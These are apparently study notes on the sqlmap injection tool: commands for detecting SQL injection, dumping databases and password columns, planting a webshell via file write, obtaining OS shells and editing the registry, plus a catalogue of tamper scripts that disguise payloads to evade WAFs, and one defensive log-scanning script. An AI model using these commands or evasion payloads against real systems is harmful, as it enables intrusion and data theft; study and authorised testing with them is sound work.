Study notes: Sqlmap

Sqlmap


Disclaimer

This document is for learning and research only. Do not use the techniques or source code in it for illegal purposes; the author bears no responsibility for any negative consequences caused by anyone.


Project address

Articles & References


Basic usage

Detecting injection

sqlmap -u URL -v 3 --random-agent                       # test for injection (verbosity 3, random User-Agent)
sqlmap -u URL -p id                                     # test a specific parameter
sqlmap -u URL --cookie="xxxxx"                          # inject with a cookie
sqlmap -u URL --batch                                   # never ask for user input, use the default behaviour
sqlmap -r aaa.txt                                       # POST injection from a saved request file

sqlmap -u URL --flush-session                           # flush the cached session files for the target

sqlmap -u URL --os "Windows"                            # force the back-end operating system
sqlmap -u URL --dbms mysql --level 3                    # force DBMS type MySQL, level 3 (1-5; the higher the level, the more thorough the tests)
sqlmap -u URL --dbms "Microsoft SQL Server"             # a DBMS name containing spaces must be quoted
sqlmap -u URL --dbms mysql --risk 3                     # risk of the tests (1-3, default 1): 1 runs most test statements, 2 adds time-based tests, 3 adds OR-based SQL injection tests
sqlmap -u URL --proxy "socks5://127.0.0.1:1080"         # test through a proxy
sqlmap -u URL --batch --smart                           # heuristic detection of injection

Getting information

sqlmap -u URL --current-db          # current database
sqlmap -u URL --dbs                 # enumerate all databases
sqlmap -u URL -f                    # fingerprint the DBMS version
sqlmap -u URL --is-dba              # is the current user a DBA?
sqlmap -u URL --users               # list DBMS users
sqlmap -u URL --privileges          # enumerate DBMS users' privileges
sqlmap -u URL --passwords           # get the DBMS users' passwords

sqlmap -u URL -D DATABASE --tables  # tables of a database
sqlmap -u URL -D DATABASE -T TABLES --columns           # column names of the given table
sqlmap -u URL -D DATABASE -T TABLES -C COLUMNS --dump   # dump the given columns of the table
sqlmap -u URL --dbms mysql --level 3 -D test -T admin -C "username,password" --dump    # dump the data of the username and password fields
sqlmap -u URL --dump-all            # dump every table of every database

Searching for columns

sqlmap -r "c:\tools\request.txt" --dbms mysql -D dedecms --search -C admin,password  # search the dedecms database for columns named admin or password

Reading and writing files

First find the site's physical path; the DBMS user also needs read or write privileges on the file system.

  • --file-read=RFILE  read a file from the back-end DBMS file system (physical path)
  • --file-write=WFILE local file to write to the back-end DBMS file system (mssql xp_shell)
  • --file-dest=DFILE  absolute path on the back-end DBMS file system where the file is written
sqlmap -r aaa.txt --file-dest "e:\php\htdocs\dvwa\inc\include\1.php" --file-write "f:\webshell\1112.php"

# Note: MySQL cannot list directories, it only reads single files. SQL Server can list directories but cannot read or write files; listing needs the xp_dirtree function.

Privilege escalation

sqlmap -u URL --sql-shell                       # get an interactive sql-shell session
sqlmap -u URL --os-shell                        # get an interactive os-shell session
sqlmap -u URL --os-cmd=ipconfig                 # execute a command directly through the injection point
sqlmap -d "mssql://sa:sql123456@ip:1433/master" --os-shell  # with the database password known, connect directly and escalate to an interactive system shell

Windows registry operations

--reg-read                                      # read a registry key value
--reg-add                                       # write a registry key value
--reg-del                                       # delete a registry key value
--reg-key,--reg-value,--reg-data,--reg-type     # auxiliary registry options

sqlmap -u URL --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

Estimating the time to completion

--eta                                           # estimate the remaining time to retrieve the injected data

Testing WAF/IPS/IDS protection

--identify-waf                                                      # try to identify WAF/IPS/IDS protection so that a bypass can be chosen (removed from recent sqlmap releases, where the WAF check runs by default)
--mobile                                                            # imitate a smartphone (mobile User-Agent)
--referer "http://www.google.com"                                   # spoof the Referer header
--user-agent "Googlebot/2.1(+http://www.googlebot.com/bot.html)"    # imitate the Google crawler
--skip-waf                                                          # skip heuristic detection of WAF/IPS protection
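
The options above change how sqlmap presents itself to the target: a spoofed User-Agent or Referer, a mobile User-Agent, or a fresh random User-Agent per request. The same behaviour is visible from the server side. The script below is an added example, not part of this page or of sqlmap: a small Python scanner over web-server access-log lines (constructed sample lines in the combined log format) that flags sqlmap's default User-Agent, a Googlebot claim from an address that is not on a verified-crawler list, per-client User-Agent churn, and bursts of 5xx responses. The crawler list is a constructed stand-in (in production a Googlebot claim is confirmed with a reverse DNS lookup followed by a forward lookup), and the function names and thresholds are my own choices.

```python
import re
from collections import defaultdict

# Constructed access-log lines in the "combined" format (not from a real server).
# 203.0.113.10 keeps sqlmap's default User-Agent; 203.0.113.11 claims to be Googlebot,
# then cycles User-Agents (--random-agent) while triggering server errors.
SAMPLE_LOG = """\
203.0.113.10 - - [03/Nov/2022:09:23:01 +0800] "GET /artists.php?artist=1 HTTP/1.1" 200 512 "-" "sqlmap/1.6.10#stable (https://sqlmap.org)"
203.0.113.11 - - [03/Nov/2022:09:23:02 +0800] "GET /artists.php?artist=1 HTTP/1.1" 200 512 "http://www.google.com" "Googlebot/2.1 (+http://www.google.com/bot.html)"
203.0.113.11 - - [03/Nov/2022:09:23:03 +0800] "GET /artists.php?artist=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/106.0"
203.0.113.11 - - [03/Nov/2022:09:23:04 +0800] "GET /artists.php?artist=1 HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) Safari/605.1.15"
203.0.113.11 - - [03/Nov/2022:09:23:05 +0800] "GET /artists.php?artist=1 HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/107.0"
198.51.100.7 - - [03/Nov/2022:09:23:06 +0800] "GET /artists.php?artist=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/107.0"
"""

# Placeholder for a verified-crawler list (constructed value). In production, confirm a
# Googlebot claim with a reverse DNS lookup of the source IP and a forward lookup of
# the returned name instead of relying on a static list.
VERIFIED_CRAWLER_IPS = {"66.249.66.1"}

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text, verified_crawlers=VERIFIED_CRAWLER_IPS, ua_churn=3, error_burst=2):
    """Return {client_ip: sorted list of finding names} for suspicious clients."""
    uas_by_ip = defaultdict(set)
    errors_by_ip = defaultdict(int)
    findings = defaultdict(set)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ua = rec["ip"], rec["ua"]
        uas_by_ip[ip].add(ua)
        if rec["status"].startswith("5"):
            errors_by_ip[ip] += 1
        if ua.startswith("sqlmap/"):                # the tool's own default User-Agent
            findings[ip].add("default-sqlmap-user-agent")
        if "Googlebot" in ua and ip not in verified_crawlers:   # --user-agent "Googlebot/..." spoof
            findings[ip].add("unverified-googlebot-claim")
    for ip, uas in uas_by_ip.items():               # --random-agent: one client, many browsers
        if len(uas) >= ua_churn:
            findings[ip].add("user-agent-churn")
    for ip, n in errors_by_ip.items():              # higher --level/--risk probing tends to raise 5xx
        if n >= error_burst:
            findings[ip].add("server-error-burst")
    return {ip: sorted(names) for ip, names in findings.items()}


if __name__ == "__main__":
    for ip, names in scan_log(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

The thresholds are deliberately low for the six-line sample; on real traffic they belong on a sliding time window per client, and the crawler check must be replaced by the DNS confirmation described above. Payload content is a separate concern and is not inspected here.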

Trying to get a shell

sqlmap -d "mysql://root:root@192.168.1.1:3306/mysql" --os-shell

Wide-byte detection

sqlmap -u URL --dbms mysql --prefix "%df%27" --technique U -v 3     # wide-byte injection check

UNION query tests

--union-cols=UCOLS  range of columns to test for UNION query SQL injection
--union-char=UCHAR  character to use for brute-forcing the number of columns
--union-from=UFROM  table to use in the FROM part of the UNION query

tamper

Usage

python sqlmap.py -u http://xx.xxx.xx.xx?id=1 --tamper xxx.py

Related articles

0eunion.py

Replaces instances of UNION with e0UNION

Requirement:

  • MySQL
  • MsSQL

Notes:

>>> tamper('1 UNION ALL SELECT')
'1e0UNION ALL SELECT'

apostrophemask.py

Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87, the URL-encoded UTF-8 form)

References:

>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py

Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)

>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'

appendnullbyte.py

Appends (Access) NULL byte character (%00) at the end of the payload

Requirement:

  • Microsoft Access

Reference

>>> tamper('1 AND 1=1')
'1 AND 1=1%00'

base64encode.py

Base64-encodes all characters in a given payload

>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='

between.py

Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'

>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'

binary.py

Injects keyword binary where possible

Requirement:

  • MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
'1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
>>> tamper('1 AND 2>1')
'1 AND binary 2>binary 1'
>>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'

bluecoat.py

Replaces space character after SQL statement with a valid random blank character. Afterwards replaces character '=' with operator LIKE

In the example below the blank is %09 (tab) and LIKE replaces =

Requirement:

Tested against:

  • MySQL 5.1, SGOS
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'

chardoubleencode.py

Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)

>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

charencode.py

URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

charunicodeencode.py

Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)

Requirement:

  • ASP
  • ASP.NET

Tested against:

  • Microsoft SQL Server 2000
  • Microsoft SQL Server 2005
  • MySQL 5.1.56
  • PostgreSQL 9.0.3
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

charunicodeescape.py

Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054), i.e. the % of the URL form becomes a backslash

>>> tamper('SELECT FIELD FROM TABLE')
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'

commalesslimit.py

Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart

Requirement:

  • MySQL

Tested against:

  • MySQL 5.0 and 5.5
>>> tamper('LIMIT 2, 3')
'LIMIT 3 OFFSET 2'

commalessmid.py

Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart

Requirement:

  • MySQL

Tested against:

  • MySQL 5.0 and 5.5
>>> tamper('MID(VERSION(), 1, 1)')
'MID(VERSION() FROM 1 FOR 1)'

commentbeforeparentheses.py

Prepends (inline) comment before parentheses (e.g. '(' -> '/**/(')

Tested against:

  • Microsoft SQL Server
  • MySQL
  • Oracle
  • PostgreSQL
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'

concat2concatws.py

Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart

Requirement:

  • MySQL

Tested against:

  • MySQL 5.0
>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'

dunion.py

Replaces instances of UNION with DUNION

Requirement:

  • Oracle

Reference

>>> tamper('1 UNION ALL SELECT')
'1DUNION ALL SELECT'

equaltolike.py

Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'

equaltorlike.py

Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart

Tested against:

  • MySQL 4, 5.0 and 5.5
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id RLIKE 1'

escapequotes.py

Slash-escapes single and double quotes (e.g. ' -> \')

>>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#'

greatest.py

Replaces greater than operator ('>') with 'GREATEST' counterpart

Tested against:

  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'

halfversionedmorekeywords.py

Adds (MySQL) versioned comment before each keyword

Requirement:

  • MySQL < 5.1

Tested against:

  • MySQL 4.0.18, 5.0.22
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

hex2char.py

Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart

Requirement:

  • MySQL

Tested against:

  • MySQL 4, 5.0 and 5.5
>>> tamper('SELECT 0xdeadbeef')
'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'

htmlencode.py

HTML-encodes (using code points) all non-alphanumeric characters (e.g. ' -> &#39;)

>>> tamper("1' AND SLEEP(5)#")
'1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'

ifnull2casewhenisnull.py

Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart

Requirement:

  • MySQL
  • SQLite (possibly)
  • SAP MaxDB (possibly)

Tested against:

  • MySQL 5.0 and 5.5
>>> tamper('IFNULL(1, 2)')
'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'

ifnull2ifisnull.py

Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart

Requirement:

  • MySQL
  • SQLite (possibly)
  • SAP MaxDB (possibly)

Tested against:

  • MySQL 5.0 and 5.5
>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'

informationschemacomment.py

Adds an inline comment (/**/) to the end of all occurrences of the (MySQL) "information_schema" identifier

>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'

least.py

Replaces greater than operator ('>') with 'LEAST' counterpart

Tested against:

  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
>>> tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'

lowercase.py

Replaces each keyword character with its lower case value (e.g. SELECT -> select)

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
>>> tamper('INSERT')
'insert'

luanginx.py

LUA-Nginx WAFs Bypass (e.g. Cloudflare)

Reference:

>>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload)
'34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=
&1 AND 2>1'

misunion.py

Replaces instances of UNION with -.1UNION

Requirement:

  • MySQL

Reference

>>> tamper('1 UNION ALL SELECT')
'1-.1UNION ALL SELECT'
>>> tamper('1" UNION ALL SELECT')
'1"-.1UNION ALL SELECT'

modsecurityversioned.py

Embraces complete query with (MySQL) versioned comment

Requirement:

  • MySQL

Tested against:

  • MySQL 5.0
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30963AND 2>1*/--'

modsecurityzeroversioned.py

Embraces complete query with (MySQL) zero-versioned comment

Requirement:

  • MySQL

Tested against:

  • MySQL 5.0
>>> tamper('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'

multiplespaces.py

Adds multiple spaces (' ') around SQL keywords

Reference

>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1     UNION     SELECT     foobar'

overlongutf8.py

Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)

Reference:

>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'

overlongutf8more.py

Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)

Reference:

>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'

percentage.py

Adds a percentage sign ('%') in front of each character (e.g. SELECT -> %S%E%L%E%C%T)

Requirement:

  • ASP

Tested against:

  • Microsoft SQL Server 2000, 2005
  • MySQL 5.1.56, 5.5.11
  • PostgreSQL 9.0
>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'

plus2concat.py

Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart

Tested against:

  • Microsoft SQL Server 2012

Requirements:

  • Microsoft SQL Server 2012+
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'

>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe'

plus2fnconcat.py

Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart

Tested against:

  • Microsoft SQL Server 2008

Requirements:

  • Microsoft SQL Server 2008+

Notes:

>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'

>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'

randomcase.py

Replaces each keyword character with a random case value (e.g. SELECT -> SEleCt)

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
  • SQLite 3
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'InSeRt'
>>> tamper('f()')
'f()'
>>> tamper('function()')
'FuNcTiOn()'
>>> tamper('SELECT id FROM `user`')
'SeLeCt id FrOm `user`'

randomcomments.py

Adds random inline comments (/**/) inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/NS/**/ERT'

schemasplit.py

Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users')

Requirement:

  • MySQL

Reference:

>>> tamper('SELECT id FROM testdb.users')
'SELECT id FROM testdb 9.e.users'

sleep2getlock.py

Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)"

Requirement:

  • MySQL

Tested against:

  • MySQL 5.0 and 5.5

Reference:

>>> tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName
True

sp_password.py

Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

Requirement:

  • MSSQL

Reference:

>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'

space2comment.py

Replaces space character (' ') with comments '/**/'

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'

space2dash.py

Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')

Requirement:

  • MSSQL
  • SQLite

Reference:

>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227'

space2hash.py

Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

Requirement:

  • MySQL

Tested against:

  • MySQL 4.0, 5.0
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227'

space2morecomment.py

Replaces (MySQL) instances of space character (' ') with comments '/**_**/'

Tested against:

  • MySQL 5.0 and 5.5
>>> tamper('SELECT id FROM users')
'SELECT/**_**/id/**_**/FROM/**_**/users'

space2morehash.py

Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

Requirement:

  • MySQL >= 5.1.13

Tested against:

  • MySQL 5.1.41
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227'

space2mssqlblank.py

Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters

Requirement:

  • Microsoft SQL Server

Tested against:

  • Microsoft SQL Server 2000
  • Microsoft SQL Server 2005
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%04users'

space2mssqlhash.py

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n'), i.e. a space becomes %23%0A

Requirement:

  • MSSQL
  • MySQL
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'

space2mysqlblank.py

Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters

Requirement:

  • MySQL

Tested against:

  • MySQL 5.1
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0CFROM%0Dusers'

space2mysqldash.py

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')

Requirement:

  • MySQL
  • MSSQL
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'

space2plus.py

Replaces space character (' ') with plus ('+')

>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'

space2randomblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'

substring2leftright.py

Replaces PostgreSQL SUBSTRING with LEFT and RIGHT

Tested against:

  • PostgreSQL 9.6.12
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')
'LEFT((SELECT usename FROM pg_user)::text,1)'
